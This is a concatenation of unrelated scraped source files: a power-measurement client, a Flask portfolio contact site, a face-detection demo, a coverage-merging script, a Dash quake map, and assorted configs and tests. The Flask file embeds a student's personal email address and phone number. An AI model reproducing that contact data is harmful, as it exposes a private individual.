    exit(1)
# Connect to the PTD server and verify the handshake.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((args.serverIpAddress, args.serverPort))
serv = lib.Proto(s)
if serv.command("hello") != "Hello from server!":
    logging.fatal("Not a server")
    exit(1)
logging.info(f"Creating output directory {args.output!r}")
os.mkdir(args.output)
# Run the user-supplied time-sync command (e.g. ntp) before comparing clocks.
logging.info(f"Running {args.ntp_command!r}")
subprocess.run(args.ntp_command, shell=True, check=True)
command(serv, "init", check=True)
# Bracket the server's "time" reply between two local readings to bound
# the client/server clock offset.
client_time1 = time.time()
serv_time = float(serv.command("time"))
client_time2 = time.time()
dt1 = 1000 * (client_time1 - serv_time)
dt2 = 1000 * (client_time2 - serv_time)
logging.info(f"The time difference is in {dt1:.3}ms..{dt2:.3}ms")
# Two measurement passes: "ranging" first, then "testing" — presumably the
# first pass lets the power meter pick its range; confirm against lib/server.
for mode in ["ranging", "testing"]:
    logging.info(f"Running workload in {mode} mode")
    out = f"{args.output}/{mode}"
    os.mkdir(out)
    # The run hooks learn the mode and output directory via environment vars.
    env = os.environ.copy()
    env["ranging"] = "1" if mode == "ranging" else "0"
    env["out"] = out
    logging.info("Running runBefore")
    subprocess.run(args.run_before, shell=True, check=True, env=env)
    command(serv, f"start-{mode},workload", check=True)
    logging.info("Running runWorkload")
    subprocess.run(args.run_workload, shell=True, check=True, env=env)
    command(serv, "stop", check=True)
    # Fetch this run's power log; valid replies are "base64 <payload>".
    log = serv.command("get-last-log")
    if log is None or not log.startswith("base64 "):
        logging.fatal("Could not get log from the server")
        exit(1)
    with open(out + "/spl.txt", "wb") as f:
        f.write(base64.b64decode(log[len("base64 ") :]))
    logging.info("Running runAfter")
    subprocess.run(args.run_after, shell=True, check=True, env=env)
logging.info("Done runs")
# Fetch the full session log covering both passes.
log = serv.command("get-log")
if log is None or not log.startswith("base64 "):
    logging.fatal("Could not get log from the server")
    exit(1)
with open(args.output + "/spl-full.txt", "wb") as f:
    f.write(base64.b64decode(log[len("base64 ") :]))
logging.info("Successful exit")
| [
"albert.safin@xored.com"
] | albert.safin@xored.com |
ce8172e73f8dbe5b64f6896e1a018ef2b910b9f3 | c60b5d841e3a1e79a15335bbd3c4e8128d77ad94 | /Main.py | a24a78f4fffd69710ce8577be465d245e04fed02 | [] | no_license | ClaudiuChelcea/Presentation-Website | fbc035dd79eb036fde7475ff4b52ad229999777e | 89fc48814dc33085a59e148889424b0dcb86b222 | refs/heads/main | 2023-06-13T00:15:50.205264 | 2021-07-12T14:04:49 | 2021-07-12T14:04:49 | 331,597,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,694 | py | from flask import Flask, render_template, request
from flask_mail import Mail, Message
# The webpages are:
# Home: http://127.0.0.1:5000/index
# Contact: http://127.0.0.1:5000/Contact
# Configure outgoing email (Flask-Mail over Gmail SMTP).
app = Flask(__name__)
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 465
# ~~~~~~~~~~~~~~~ INSERT YOUR EMAIL HERE ! ~~~~~~~~~~~~~~~~~
default_email = "any_gmail_dummy@gmail.com"
default_password = "dummy_gmail_password"
app.config['MAIL_USERNAME'] = default_email
app.config['MAIL_PASSWORD'] = default_password
# Warn on the console if the placeholder credentials were not replaced.
if app.config['MAIL_USERNAME'] == default_email:
    print("\n<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< ATTENTION >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
    print("Watch out! For the contact page to submit an email to me correctly, you have to insert \
in the code, as mentioned in the README, a valid email address!");
    print("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< ATTENTION >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n")
    print("Website: http://127.0.0.1:5000/index\n")
# Mail transport: implicit SSL on port 465 (TLS/STARTTLS disabled).
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
mail = Mail(app)
# Index page
@app.route('/index')
def home():
    """Serve the landing page with page metadata and contact details."""
    page_meta = {
        "title": "Home",
        "icon": "https://static.thenounproject.com/png/2048828-200.png",
    }
    owner = {
        "name": "Chelcea Claudiu",
        "status": "Computer Science & Engineering Student",
        "gmail": "claudiuchelcea01@gmail.com",
        "number": "(+40) 763 665 892",
    }
    return render_template("index.html", title=page_meta, contact=owner)
# Contact page
@app.route('/Contact', methods=['GET', 'POST'])
def contact():
    """Serve the contact form with its metadata and reason choices."""
    page_meta = {
        "title": "Contact page",
        "icon": "https://i.pinimg.com/originals/bb/18/bd/bb18bdbbef437b2d50518db5a8292c94.png",
    }
    reason_choices = ["Other", "Project", "Job offer"]
    return render_template("Contact.html", title=page_meta, reasons=reason_choices)
# Thank you page
@app.route('/ThankYou', methods=["POST"])
def thankyou():
    """Handle the contact-form POST: validate fields, email the site
    owner, and render either the thank-you or the error page."""
    meta = {"title": "Thank you"}
    meta.update({"icon": "https://img.freepik.com/free-icon/present-box-with-big-bow_318-9536.jpg?size=338&ext=jpg"})
    # Fields submitted from Contact.html.
    name = request.form.get("name")
    email = request.form.get("email")
    reason = ["Other", "Project", "Job offer"]
    message = request.form.get("message")
    company = request.form.get("company")
    phone = request.form.get("phone")
    # Echo the submitted values back to the template through the meta dict.
    meta.update({"name": name})
    meta.update({"email": email})
    meta.update({"message": message})
    meta.update({"company": company})
    meta.update({"phone": phone})
    # Any empty/missing field -> show the error page instead.
    if not name or not email or not message or not phone or not company:
        meta["title"] = "Error"
        meta["icon"] = "https://www.freeiconspng.com/thumbs/error-icon/error-icon-3.png"
        return render_template("Error.html", title=meta, reasons=reason)
    meta["title"] = "Thank you"
    meta["icon"] = "https://img.freepik.com/free-icon/present-box-with-big-bow_318-9536.jpg?size=338&ext=jpg"
    # NOTE(review): from here on `reason` is the selected string, not the
    # list above — the ThankYou template presumably accepts that; confirm.
    reason = request.form.get("reason")
    # Sending requires real Gmail credentials in default_email/default_password
    # near the top of this file (see the README).
    msg = Message('Form submission', sender=default_email, recipients=['claudiuchelcea01@gmail.com'])
    msg.body = "Name: " + name + "\n" + "Company: " + company + "\nEmail: " + email + "\nPhone number: " + \
               phone + "\n\nContact reason: " + reason + "\nMessage: " + message
    mail.send(msg)
    return render_template("ThankYou.html", title=meta, reasons=reason)
# Development server entry point
if __name__ == "__main__":
    # Only for debugging while developing — debug=True enables the
    # interactive debugger and must not be used in production.
    app.run(host='0.0.0.0', debug=True, port=5000)
| [
"noreply@github.com"
] | ClaudiuChelcea.noreply@github.com |
4133d8de12e950deab0ef7eb66dff3ef852e342b | 5cc1421f5280c4c869e5df5b936f4d629693d0f1 | /main.py | 139b340dbacec7bbaa8633419be07b3aeef61f1e | [
"MIT"
] | permissive | zhangxujinsh/MTCNN-VS | 96c38479fa6e6aa5dea0e855cddcf8548ea7872d | 42d79c0a8954493fd8afb4a6665584da9a8b9c6e | refs/heads/master | 2020-07-11T01:51:40.142178 | 2016-10-29T02:13:57 | 2016-10-29T02:17:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,875 | py | # coding: utf-8
import mxnet as mx
from mtcnn_detector import MtcnnDetector
import cv2
import os
import time
def testimg(detector):
    """Detect faces in 'test.jpg', draw boxes and landmarks, display the
    result, and save it to result.png. (Python 2 code.)"""
    img = cv2.imread('test.jpg')
    t1 = time.time()
    results = detector.detect_face(img)
    print 'time: ',time.time() - t1
    # detect_face returns None when no face was found.
    if results is not None:
        total_boxes = results[0]  # one bounding box row per detected face
        points = results[1]       # landmarks: 5 x-coords then 5 y-coords per face
        draw = img.copy()
        for b in total_boxes:
            cv2.rectangle(draw, (int(b[0]), int(b[1])), (int(b[2]), int(b[3])), (255, 255, 255))
        for p in points:
            for i in range(5):
                cv2.circle(draw, (p[i], p[i + 5]), 1, (0, 0, 255), 2)
        cv2.imshow("detection result", draw)
        cv2.imwrite("result.png", draw)
        cv2.waitKey(0)  # block until a key is pressed
# --------------
# test on camera
# --------------
def testcamera(detector):
    """Continuously detect faces from the default webcam and display the
    annotated frames until 'q' or 'Q' is pressed. (Python 2 code.)"""
    camera = cv2.VideoCapture(0)  # default capture device
    while True:
        grab, frame = camera.read()
        img = cv2.resize(frame, (320,180))  # downscale before detection
        t1 = time.time()
        results = detector.detect_face(img)
        print 'time: ',time.time() - t1
        if results is None:
            # No face in this frame: still refresh the preview window.
            cv2.imshow("detection result", img)
            cv2.waitKey(1)
            continue
        total_boxes = results[0]  # one bounding box row per detected face
        points = results[1]       # landmarks: 5 x-coords then 5 y-coords per face
        draw = img.copy()
        for b in total_boxes:
            cv2.rectangle(draw, (int(b[0]), int(b[1])), (int(b[2]), int(b[3])), (255, 255, 255))
        for p in points:
            for i in range(5):
                cv2.circle(draw, (p[i], p[i + 5]), 1, (255, 0, 0), 2)
        cv2.imshow("detection result", draw)
        key=cv2.waitKey(1)
        # Quit on 'q'/'Q'; mask to the low byte of the key code.
        if 'q'==chr(key & 255) or 'Q'==chr(key & 255):
            break;
if __name__=="__main__":
detector = MtcnnDetector(model_folder='model', ctx=mx.gpu(0), num_worker = 4 , accurate_landmark = False)
# testimg(detector)
testcamera(detector) | [
"1293830063@qq.com"
] | 1293830063@qq.com |
0d6192d9c96cea55cce85588b2f9354cbdb21b81 | b7ddb90ae9fbcf831edb2495e7e65b9cebb0498e | /RawrfenServer/coord.py | cb195b7aee34367aa3d3008886876b742b540f69 | [] | no_license | Astarisk/RawrfenWeb | c60ee04e0e6e5c57ff662bc903cacaaa308c2882 | 227d49cc074e81f4c3df272750225fd00211d6eb | refs/heads/master | 2023-03-09T11:52:38.425461 | 2022-12-16T18:19:06 | 2022-12-16T18:19:06 | 138,544,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | class Coord:
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return "({0} {1})".format(self.x, self.y)
def __repr__(self):
return "Coord({0} , {1})".format(self.x, self.y)
def mul(self, f):
return Coord(self.x * f.x, self.y * f.y)
class Coord2d:
    """Placeholder 2-D coordinate class (no fields yet)."""
    def __init__(self):
        # Fixed typo: the method was named __int__, so it was never run on
        # construction, and as written int(Coord2d()) would have raised
        # TypeError anyway (it returned None). No working caller could
        # have relied on the old name.
        pass
| [
"astarisk@gmail.com"
] | astarisk@gmail.com |
ad867cae223caa2d23bb5107206d641e399b3f90 | e70238ae0e2fc3cec3659b3ddac84d48f87b8dad | /.svn/pristine/ad/ad867cae223caa2d23bb5107206d641e399b3f90.svn-base | 41944f2510338a6d2a1e2de80eaff5acc6713fee | [] | no_license | rzk1/cp2k-mcgill | 8cc92ae6097265644b9014657c7c4f220dfc2c35 | 56e0ed32a825e5e82004bdcef707e24c25f56a43 | refs/heads/master | 2021-01-20T17:40:15.918278 | 2019-07-11T18:08:13 | 2019-07-11T18:08:13 | 64,575,680 | 2 | 2 | null | 2019-08-07T17:38:51 | 2016-07-31T03:47:36 | Fortran | UTF-8 | Python | false | false | 4,433 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# author: Ole Schuett
import sys
from os import path
#===============================================================================
def main():
if(len(sys.argv) != 3):
print("Usage: bcast_tmpl_coverage.py <lcov_in.info> <lcov_out.info>")
print("Broadcasts coverage stats across all template instances.")
sys.exit(1)
fn_in, fn_out = sys.argv[1:]
print("Reading "+fn_in)
content = open(fn_in).read()
# pass 1: find all records
records = dict()
curr_record = []
curr_fn = None
for line in content.split("\n"):
curr_record.append(line)
if(line.startswith("SF:")):
curr_fn = line[3:]
#print(curr_fn)
elif(line.startswith("end_of_record")):
if(not records.has_key(curr_fn)):
records[curr_fn] = list()
records[curr_fn] += curr_record
curr_record = []
curr_fn = None
# pass 3: sort records
content_sorted = []
for k in sorted(records.keys()):
content_sorted += records[k]
# pass 4: join records into broadcast groups
groups = []
prev_fn = prev_line_nums = None
curr_fn = curr_line_nums = None
curr_group = []
for line in content_sorted:
curr_group.append(line)
if(line.startswith("SF:")):
prev_fn = curr_fn
prev_line_nums = curr_line_nums
curr_fn = line[3:]
curr_line_nums = []
#print(curr_fn)
elif(line[:3] in ("FN:", "DA:")):
lineno = int(line[3:].split(",")[0])
curr_line_nums.append(lineno)
elif(line.startswith("end_of_record")):
if(similar(curr_fn, prev_fn) and curr_line_nums==prev_line_nums):
groups[-1] += curr_group
print("Broadcasting: "+path.basename(prev_fn), "<->",path.basename(curr_fn))
else:
groups.append(curr_group)
curr_group = [] # start a new group
output = []
for group in groups:
FNs = dict()
FNDAs = dict()
DAs = dict()
# pass 5: broadcast coverage stats within groups
for line in group:
if(line.startswith("FN:")):
lno, name = line[3:].split(",")
FNs[name] = lno
elif(line.startswith("FNDA:")):
count, name = line[5:].split(",")
uid = FNs[name] if(name in FNs) else name
FNDAs[uid] = max(int(count), FNDAs.get(uid, 0))
elif(line.startswith("DA:")):
lno, count = line[3:].split(",")
DAs[lno] = max(int(count), DAs.get(lno, 0))
# pass 6: write new records
for line in group:
if(line.startswith("FNDA:")):
count, name = line[5:].split(",")
uid = FNs[name] if(name in FNs) else name
output.append( "FNDA:%d,%s"%(FNDAs[uid], name) )
elif(line.startswith("DA:")):
lno, count = line[3:].split(",")
output.append( "DA:%s,%d"%(lno,DAs[lno]) )
elif(line.startswith("LH:")):
count = len([v for v in DAs.values() if v>0])
output.append( "LH:%d"%count )
elif(line.startswith("FNH:")):
count = len([v for v in FNDAs.values() if v>0])
output.append( "FNH:%d"%count )
else:
output.append(line)
print("Writting "+fn_out)
f = open(fn_out, "w")
f.write("\n".join(output))
f.close()
#===============================================================================
def similar(a, b):
    """Check whether two coverage filenames are "very similar".

    Two paths count as similar when they share the same directory and
    extension, their base names split into the same number of
    '_'-separated fields, and exactly one of those fields differs.
    Used to decide whether two coverage records should be merged into
    one broadcast group.
    """
    if a is None or b is None:
        return False
    if path.dirname(a) != path.dirname(b):
        return False
    a_name = path.basename(a)
    b_name = path.basename(b)
    # Robustness fix: a name without a '.' cannot be split into
    # (base, ext); the old unpacking raised ValueError here.
    if "." not in a_name or "." not in b_name:
        return False
    a_base, a_ext = a_name.rsplit(".", 1)
    b_base, b_ext = b_name.rsplit(".", 1)
    if a_ext != b_ext:
        return False
    a_parts = a_base.split("_")
    b_parts = b_base.split("_")
    if len(a_parts) != len(b_parts):
        return False
    diffs = len(a_parts) - sum(i == j for i, j in zip(a_parts, b_parts))
    return diffs == 1  # exactly one field must differ
#===============================================================================
if(len(sys.argv)==2 and sys.argv[-1]=="--selftest"):
pass #TODO implement selftest
else:
main()
#EOF
| [
"rustam@khaliullin.com"
] | rustam@khaliullin.com | |
479b96bffec928063f8a1b56155e43ecb94f2fa9 | fa4bc02ccbc8cdd8d09507b96f40f3bb4b8b7549 | /DashApp/pages/map.py | d81d3c133441b6948452388851efb20561e1897a | [
"MIT"
] | permissive | violet-love/quake-ds | 1800d1a3df222413728a757d09ce294219c1dd5f | 8dfdcd48c80b0310a97808668677a5baf636122d | refs/heads/master | 2021-03-11T03:37:16.924918 | 2020-03-10T02:49:29 | 2020-03-10T02:49:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,412 | py | import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.express as px
import plotly.graph_objs as go
import requests
import pandas as pd
from app import app
column1 = dbc.Col(
[
dcc.Markdown(
"""
## This is a map of recent earthquakes
select from the drop down menu what period of time you would like
to see earthquakes for.
"""
),
html.Div([
dcc.Dropdown(
id='timeFrame',
options=[
{'label': 'Last Quake', 'value': 'lastQuake'},
{'label': 'Last Hour', 'value': 'last/hour'},
{'label': 'Last Day', 'value': 'last/day'},
{'label': 'Last Week', 'value': 'last/week'},
{'label': 'Last Month', 'value': 'last/month'}
],
value='lastQuake'
),
html.Div(id='menuItems')
])
],
md=2,
)
#fig = go.Figure()
@app.callback(
    dash.dependencies.Output('wheretheDataGoes', 'figure'),
    [dash.dependencies.Input('timeFrame', 'value')])
def update_output(value):
    """Fetch quakes for the chosen time frame and render them on a map."""
    response = requests.get(f'https://quake-ds-production.herokuapp.com/{value}')
    records = response.json()['message']
    # A single "last quake" comes back as one dict, so it needs an index.
    if value != 'lastQuake':
        df = pd.DataFrame(records)
    else:
        df = pd.DataFrame(records, index=[0])
    df['lat'] = df['lat'].apply(str)
    df['lon'] = df['lon'].apply(str)
    markers = go.Scattermapbox(
        lat=df['lat'],
        lon=df['lon'],
        mode='markers',
        marker=go.scattermapbox.Marker(size=14),
        text=df['place'],
    )
    layout = go.Layout(
        autosize=True,
        hovermode='closest',
        mapbox=go.layout.Mapbox(
            bearing=0,
            center=go.layout.mapbox.Center(lat=0, lon=0),
            pitch=0,
            zoom=.5,
        ),
    )
    fig = go.Figure(data=[markers], layout=layout)
    fig.update_layout(mapbox_style='stamen-terrain', height=700)
    return fig
column2 = dbc.Col([
dcc.Graph(id='wheretheDataGoes'),
])
layout = dbc.Row([column1, column2], style={'margin-top': 100, 'height': 1000})
| [
"eyvonne@users.noreply.github.com"
] | eyvonne@users.noreply.github.com |
23763377163d76db4dd43f0f81a90b02e45179da | 50debf18fe2fda56780aecfa81004fc351301fc7 | /carbike/apps.py | 4f2443f8058b15c5fb3a4a632dac25ea4d71076c | [] | no_license | koumaron/carbike | 97d52626f1aa0317eac1bed701c5a46241715d7b | bbbe41d64b77e28256d4483bd3f83ca255b6e068 | refs/heads/main | 2023-02-18T23:12:16.701550 | 2021-01-20T06:12:25 | 2021-01-20T06:12:25 | 331,205,043 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | from django.apps import AppConfig
class CarbikeConfig(AppConfig):
    """Django application configuration for the 'carbike' app."""
    name = 'carbike'
| [
"noreply@github.com"
] | koumaron.noreply@github.com |
8d85aaa01325ea01f6ece159131b127ef9047799 | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-gsn-edf.0/gsn-edf_ut=3.5_rd=0.5_rw=0.06_rn=4_u=0.075-0.325_p=harmonic-2/sched=RUN_trial=26/sched.py | 1613dd9b0c794754a75a5de64bc5ac7319aa1a66 | [] | no_license | ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 342 | py | -X FMLP -Q 0 -L 3 95 400
-X FMLP -Q 0 -L 3 66 300
-X FMLP -Q 0 -L 3 54 175
-X FMLP -Q 1 -L 2 53 200
-X FMLP -Q 1 -L 2 50 200
-X FMLP -Q 1 -L 2 44 175
-X FMLP -Q 2 -L 2 34 125
-X FMLP -Q 2 -L 2 34 175
-X FMLP -Q 3 -L 1 33 175
-X FMLP -Q 3 -L 1 31 200
28 150
25 175
24 125
20 200
20 150
18 150
14 175
13 100
9 125
| [
"ricardo.btxr@gmail.com"
] | ricardo.btxr@gmail.com |
ba1619c95c501c1725a03a9611066e17c4f2a417 | 8b51fbf7473328cd5f7cdf5cc4d1fdb45fc020e0 | /config.py | 8c70a0cd2694f7a43d4c9dcd8b1e545a55dcab70 | [] | no_license | akesling/turntable | 46e058049c1f2a210a5fdef2f8a8340aefdf344d | 7d2caba99df97040597b31b3f9103f022834d57b | refs/heads/master | 2021-01-13T02:22:59.205735 | 2013-06-28T19:40:52 | 2013-06-28T19:40:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | """
Read in config.yaml and appropriately set all the right values before kicking
the server into a runnable state
"""
def configurate(runner_class):
    # TODO: actually read and apply config.yaml as the module docstring
    # promises; currently the runner is built with its defaults only.
    return runner_class()
| [
"ahkeslin@ncsu.edu"
] | ahkeslin@ncsu.edu |
7647f571a4f3a7aae87186379f8096ae77a5b759 | 3d904ce25b91fe6699b76b4a45f0f4e37438200f | /tests/test_slice.py | 9ded28fb242ee22c11a90ef34758d9d12ffb7a07 | [
"BSD-3-Clause"
] | permissive | mverleg/pyjson_tricks | 0dc91822a404e5d33dbd70fe23d903ebc9f7d36c | b79572f0397bc91a06f698e3e5cd9f435af84907 | refs/heads/master | 2023-09-01T22:03:19.157624 | 2023-08-19T11:57:05 | 2023-08-19T11:57:05 | 45,618,882 | 160 | 30 | NOASSERTION | 2023-08-19T11:57:06 | 2015-11-05T15:08:05 | Python | UTF-8 | Python | false | false | 461 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pathlib import Path
from json_tricks import dumps, loads
def test_slice():
original_slice = slice(0, 10, 2)
json_slice = dumps(original_slice)
loaded_slice = loads(json_slice)
assert original_slice == loaded_slice
def test_slice_no_step():
original_slice = slice(0, 5)
json_slice = dumps(original_slice)
loaded_slice = loads(json_slice)
assert original_slice == loaded_slice
| [
"claydugo@gmail.com"
] | claydugo@gmail.com |
4881f64525acb3d6be61b2f586019ec4effe954b | d39f42a4c6c49373a4c762f382101461cc75333f | /CheckingErrors.py | f877ea5f593703cec212d140d780dac128f7c486 | [] | no_license | anil3830/python | e5243db6d74b31e0c16a2eee90abd1d09062e163 | 30e177cd5f469541449da561fbc6fe0ade6ac76b | refs/heads/master | 2020-09-15T20:27:57.425691 | 2019-12-18T05:12:21 | 2019-12-18T05:12:21 | 223,550,861 | 0 | 0 | null | 2019-12-18T05:12:22 | 2019-11-23T07:41:50 | Python | UTF-8 | Python | false | false | 707 | py | #cheacking errors by using try, except , else, finally , key words
#ex multiple exception
'''try:
a=int(input('enter a value'))
d=int(input('enter d value'))
c=a/d
print(c)
except ZeroDivisionError as x:
print('the error is in',x)
##except TypeError as x:
print('the error is in',x)
except NameError as x:
print('the error is',x)
except ValueError as x:
print('the error is in',x)
finally:
print('thank you')'''
#
#
#single exception in multiple errors
n=int(input('enter any value'))
m=int(input('enter a number'))
try:
c=n+m
print(c)
except (ZeroDivisionError,NameError,TypeError,ValueError) as x:
print('the error is in ',x)
finally:
print('thank you') | [
"anilkumarjan1596@gmail.com"
] | anilkumarjan1596@gmail.com |
7451ee26f6d5e08fe204c925922a69b00af273e2 | bbc1e0f8e744d28660415d3d9348f43049222391 | /main/migrations/0027_auto_20200411_1429.py | 941f1b82974a2ef7082b60144217ae567bf2fc6c | [] | no_license | heronvas/website | 44b628edae251489218b4f1d1d689ec3fef952cd | f10ea7c3689f52fa6f51216590541f7786609125 | refs/heads/master | 2022-11-09T23:34:54.042537 | 2020-06-23T20:52:25 | 2020-06-23T20:52:25 | 274,256,774 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 722 | py | # Generated by Django 2.1.5 on 2020-04-11 08:59
import datetime
from django.db import migrations, models
# Auto-generated migration (see the "Generated by Django" header): updates
# the hard-coded datetime defaults of two DateTimeFields; the literals are
# presumably the generation timestamp -- do not edit by hand.
class Migration(migrations.Migration):
    dependencies = [
        ('main', '0026_auto_20200411_0331'),
    ]
    operations = [
        migrations.AlterField(
            model_name='disco',
            name='date',
            field=models.DateTimeField(default=datetime.datetime(2020, 4, 11, 14, 29, 38, 186863), verbose_name='date published'),
        ),
        migrations.AlterField(
            model_name='tutorialseries',
            name='series_date',
            field=models.DateTimeField(default=datetime.datetime(2020, 4, 11, 14, 29, 38, 153861), verbose_name='date published'),
        ),
    ]
| [
"heronvas897@gmail.com"
] | heronvas897@gmail.com |
665051f43c02a29b8087979305e3cca1abec9664 | fff02bef975f1ca5af8744bf1fe8fc98f2d838fe | /guessTheNumber.py | c1c60c673aa16e04968e58f497f83222d09adb86 | [] | no_license | mjcupial/PYTHON | 5aaa414694a97c9138bf5f03c72ba13e9d54492f | dfe000a1c3694fbcbbacdef54021f3519c71c801 | refs/heads/master | 2023-02-21T23:13:18.784731 | 2023-02-10T21:06:07 | 2023-02-10T21:06:07 | 82,818,336 | 1 | 0 | null | 2023-01-20T12:42:30 | 2017-02-22T15:11:17 | Python | UTF-8 | Python | false | false | 1,452 | py | # PC, just guess the number!
#
# The gamer chosses the number in previously defined range.
# The PC must guess what is the number!
# by mj.c
import random
decision = 'y'
while (decision == 'y' or decision == 'Y'):
print("Hi! I would like to guess your number! I would like to try...")
print("but first please define the range as: from x to y")
x = int(input("\nx: "))
y = int(input("y: "))
# check logic condition of range
while (y <= x):
print("WRONG! Give correct values!")
x = int(input("\nx: "))
y = int(input("y: "))
PC_number = random.randint(x,y)
tries=1
the_number = int(input("\n### Gamer! Give the number: "))
# check the_number value
while (the_number > y or the_number < x):
print("Wow! It doesn't make sense! Try again...")
the_number = int(input("\n### Gamer! Give the number: "))
# guess loop
while PC_number != the_number:
if PC_number > the_number:
print("too high...")
PC_number = random.randint(x,PC_number)
else:
print("too low...")
PC_number = random.randint(PC_number,y)
tries += 1
print("You've got it! The unknow number is: ", the_number)
print("To guess it, the PC needed only", tries, "probes!\n")
decision=input("\n\nWould you like to try again? [y/n]: ")
input("\n\nPress ENTER to continue...")
| [
"noreply@github.com"
] | mjcupial.noreply@github.com |
51094e4e71590548d90f213ebaed4ce7b2c32fbf | 513085337c4b73e3843caa6d1b9b6a74d62b5564 | /conf.py | eb84e4a08e82f8be30cc151a34b0394194fc273b | [] | no_license | Fklag/TS_ISN | 705f727888b172fbfede7ea8dc5854198c2adf0f | 9b9fd44dacbf16e8d963a0a16215521cbbceccc0 | refs/heads/master | 2020-05-17T01:07:51.695294 | 2015-06-17T10:12:10 | 2015-06-17T10:12:10 | 37,211,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,777 | py | # -*- coding: utf-8 -*-
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../modules'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.mathjax',
'luther.sphinx.video',
'luther.sphinx.reveal',
'luther.sphinx.poll',
'luther.sphinx.tabbedStuff',
'luther.sphinx.disqus',
'luther.sphinx.codelens',
'luther.sphinx.activecode',
'luther.sphinx.assess',
'luther.sphinx.animation',
'luther.sphinx.meta',
'gatech.parsons']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Informatique et Sciences du Numérique' # e.g. How To Think Like a Computer Scientist
copyright = u'2015, F. Lagrave' # e.g. "2013, Brad Miller and David Ranum"
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['ActiveIndexFiles/*']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the Sphinx documentation
# for a list of builtin themes.
html_theme = 'sphinx_bootstrap'
# Theme options are theme-specific and customize the look and feel of a theme
html_theme_options = {
# Navigation bar title. (Default: ``project`` value)
'navbar_title': "TS ISN",
# Tab name for entire site. (Default: "Site")
'navbar_site_name': "Chapitres",
# Global TOC depth for "site" navbar tab. (Default: 1)
# Switching to -1 shows all levels.
'globaltoc_depth': 1,
# Include hidden TOCs in Site navbar?
#
# Note: If this is "false", you cannot have mixed ``:hidden:`` and
# non-hidden ``toctree`` directives in the same page, or else the build
# will break.
#
# Values: "true" (default) or "false"
'globaltoc_includehidden': "true",
# HTML navbar class (Default: "navbar") to attach to <div> element.
# For dark navbar, do "navbar navbar-inverse"
'navbar_class': "navbar",
# Fix navigation bar to top of page?
# Values: "true" (default) or "false"
'navbar_fixed_top': "true",
# Location of link to source.
# Options are "nav" (default), "footer" or anything else to exclude.
'source_link_position': "nav",
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ["_templates"]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = 'CS Principles'
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title ='TS ISN'
# Logo is currently included as CSS background in default layout file. If you remove
# it there, you should specify an alternative image here.
#html_logo = "../source/_static/logo_small.png"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
module_paths = [x.replace('.','/') for x in extensions]
module_static_js = ['../modules/%s/js' % x for x in module_paths if os.path.exists('../modules/%s/js' % x)]
module_static_css = ['../modules/%s/css' % x for x in module_paths if os.path.exists('../modules/%s/css' % x)]
html_static_path = ['_static',
'../common/js',
'../common/css',
'../common/bootstrap',
'../common/images'] + module_static_js + module_static_css
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = True
# Output file base name for HTML help builder.
htmlhelp_basename = 'PythonCoursewareProjectdoc'
| [
"lycee.lagrave@free.fr"
] | lycee.lagrave@free.fr |
c6d89d295ee2dcc983253c82b25ad3252232ab12 | 733c19907e231cbc61603b1a644a78b2a113f6e3 | /rules/context.py | 53a196a65fb4251467489a0557b197e1a93dbdf1 | [] | no_license | wilysword/rule-reactor | 997be60b13c82f3bf58aa099f1e6780389608709 | 7ace02ed34da297bde3fccc41312ad6d8c89a5f6 | refs/heads/master | 2021-01-20T23:32:09.971508 | 2014-09-23T20:13:04 | 2014-09-23T20:13:04 | 38,435,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,236 | py | import logging
import functools
from copy import deepcopy

from django.db.models.signals import (
    post_init, pre_save, post_save, pre_delete, post_delete
)

